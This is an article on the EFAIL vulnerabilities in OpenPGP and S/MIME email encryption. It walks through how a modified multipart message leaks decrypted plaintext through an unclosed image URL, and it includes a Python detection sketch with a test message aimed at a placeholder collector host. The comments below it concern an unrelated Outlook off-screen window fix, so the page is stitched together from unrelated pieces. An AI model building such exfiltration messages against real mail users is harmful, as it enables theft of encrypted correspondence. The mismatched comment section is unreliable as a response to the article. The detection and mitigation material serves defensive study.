OpenPGP and S/MIME vulnerability EFAIL discovered

EFAIL is the name of a new set of vulnerabilities that allow attackers to exploit issues in OpenPGP and S/MIME to gain access to encrypted messages.
OpenPGP is an encryption standard that Internet users may use to protect sensitive data such as emails. S/MIME is another standard that is widely used in corporate environments.
EFAIL requires that the attacker has managed to gain access to encrypted emails and that the target runs client software that is vulnerable to one of the two available attack types.
An attacker could gain access to encrypted emails by monitoring network traffic, compromising email servers or the computers of users, or gaining access to backup servers.
The attack works in the following way:
- The attacker manages to get hold of an encrypted email.
- The encrypted email is modified and sent to the target.
- The client used by the target decrypts the email and loads external content that transmits the plaintext message to the attacker.
The attacker may use two different types of attacks. The first is called direct exfiltration by the developers. It works in clients such as Mozilla Thunderbird, Postbox, MailMate, iOS Mail or Apple Mail and enables the attacker to exfiltrate the plaintext message of the encrypted email directly.
This attack works in the following way:
- The attacker creates a new multipart email message and prepares it in a special way. It consists of three parts:
  - An HTML image tag that uses a src attribute that is opened with quotes but not closed.
  - The actual encrypted message using PGP or S/MIME.
  - The third part closes the open HTML tag of the first part.
- The message is sent to the target.
- The target's email client processes the email. It loads the referenced image and attaches the plaintext message that it decrypted to the image URL.
- The attacker monitors hits to the server and gets hold of the secret message this way.
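A mail gateway or triage script can look for the three-part structure described above before a message reaches a client. The following Python sketch is an added example, not code from the researchers or from any mail client; the function names, the list of attributes checked, the placeholder host `collector.invalid` and the placeholder ciphertext are assumptions, and the check is a heuristic rather than a complete filter.

```python
import re
from email import message_from_string

# A URL-bearing attribute whose opening quote is never closed before the part ends.
OPEN_ATTR = re.compile(
    r'\b(?:src|href|background|action)\s*=\s*(["\'])(?:(?!\1).)*\Z', re.I | re.S)
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted", "multipart/encrypted"}

def is_encrypted(part):
    """True for S/MIME or PGP/MIME parts and for inline PGP armor."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    body = part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in body

def find_exfil_wrapper(raw):
    """Return (html_index, encrypted_index) pairs where an HTML part with a
    dangling quoted attribute is followed by an encrypted sibling part."""
    findings = []
    for container in message_from_string(raw).walk():
        if not container.is_multipart():
            continue
        open_idx = None
        for i, part in enumerate(container.get_payload()):
            if open_idx is not None and is_encrypted(part):
                findings.append((open_idx, i))
            if part.get_content_type() == "text/html":
                body = part.get_payload(decode=True) or b""
                text = body.decode("utf-8", "replace")
                open_idx = i if OPEN_ATTR.search(text) else None
    return findings

def sample(first_html):
    """Constructed three-part test message; host and ciphertext are placeholders."""
    return "\n".join([
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="B"', "",
        "--B", "Content-Type: text/html", "", first_html,
        "--B", "Content-Type: application/pkcs7-mime; smime-type=enveloped-data",
        "Content-Transfer-Encoding: base64", "", "UExBQ0VIT0xERVI=",
        "--B", "Content-Type: text/html", "", '">',
        "--B--", ""])

if __name__ == "__main__":
    print(find_exfil_wrapper(sample('<img src="http://collector.invalid/')))
    print(find_exfil_wrapper(sample('<img src="http://collector.invalid/logo.png">')))
```

A hit means the message deserves quarantine or manual review; a clean result does not prove a message is safe, since the second attack type does not rely on this structure.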
The second attack type works against a larger number of email clients. In fact, the only clients protected against S/MIME attacks are Claws Mail and Mutt, whereas more clients are protected against PGP-targeting attacks.
What can you do to protect yourself?
The researchers suggest the following mitigation strategies:
- Short Term: Disable decryption of S/MIME or PGP emails in the email client. Copy and paste the encrypted text into separate programs to decrypt the text.
- Short Term: Disable HTML rendering in the email client for all email messages.
- Medium Term: Software companies need to patch the issues in their client applications.
- Long Term: OpenPGP and S/MIME standards need to be updated.
While not explicitly mentioned, you may also disable the loading of remote content in the email client to prevent successful exploits.
Thunderbird users may want to check out our guide Switch Between HTML And Plain Text Emails In Thunderbird to enable plaintext email messages in the client. It is furthermore advised to disable the loading of any remote content by disabling "allow remote content in messages" under Tools > Options > Privacy.
Additional information about the vulnerability is available on the website the researchers created.
Now You: Do you use OpenPGP or S/MIME?


You said that Outlook isn’t your main email client, so which is your main one?
I think it's Thunderbird
It is Mozilla Thunderbird.
Awesome! This actually solved my problem… what a stupid bug.
If this is the same bug that I’ve encountered, there may be another fix: (1) hover over open Outlook item in Taskbar, cursor up to hover over Outlook window item, and right-click; (2) this should give you Restore / Move / Size / Minimize / Maximize — choose Move or Size; (3) use your cursor keys, going arbitrarily N/S/E/W, to try to move or size the Outlook window back into view. Basically, the app behaves as though it were open in a 0x0 window, or at a location that’s offscreen, and this will frequently work to resize and/or move the window. Don’t forget to close while resized/moved, so that Outlook remembers the size/position for next time.
THANK YOU Claude!!! I could get the main window to launch but could not get any other message window to show on the desktop. You are my hero!!!!
Solved my issue! 6 years later and this is still a problem…
Fantastic. Thank you. Size did the trick.
This solved my Outlook problem, too. Thank you. :)
Thank you so much, this started happening to me today and was causing big problems. You are a life saver, I hope I can help you in some way some day.
You are a god – thank you!
thanks a lot…. work like charm.. :-)
Yah…thanks Claude. I’ve been having the same problem and tried all the suggestions…your solution was the answer. It had resized itself to a 0/0 box. Cheers
Excellent post. This had me baffled even trying to accurately describe the problem. This fixed it for me.
Thank you
Thanks a lot for the article. Don’t know why it happened, don’t know how it got fixed, but it was really annoying and now it works :-)
Thanks a lot. I was facing this issue from past 3 week. I tried everything but no resolution. The issue was happening intermittently and mainly when I was changing the display of screen ( as i use 2 monitors). The only option i had was to do system restore. But thanks to you.
I’ve been trying to solve this problem for 12 hours. Your comment about changing the display of screen helped me a lot!! Thanks!!
Thank you…don’t know why this happened but your instructions helped me fix it. Running Windows 10 and office pro 2007
Great tip! Thanks!
Worked for me, too – thank you!!!
It worked for me, too
thank you very much!
I had a similar issue with Outlook 2013 on Windows 10 and this helped me to fix it. Thank you very much!
Thank you so much. Solved!
Considering you published this in 2012, incredible not been debugged by Microsoft.
Thank you again. M
This problem was faced by only one user logging to TS 2008 r2 using outlook 2010.The issue was resolved.
Thanks.
Great tip. Thank you!!!! If it helps, I had to use the Control Key and the arrow keys at the same time to bring my window back into view. Worked like a charm.
Thank you, this worked !!!!
Man, you are a fucking god. Thanks a lot, what an annoying bug!!
Awesome, this post solved the issue. Many thanks!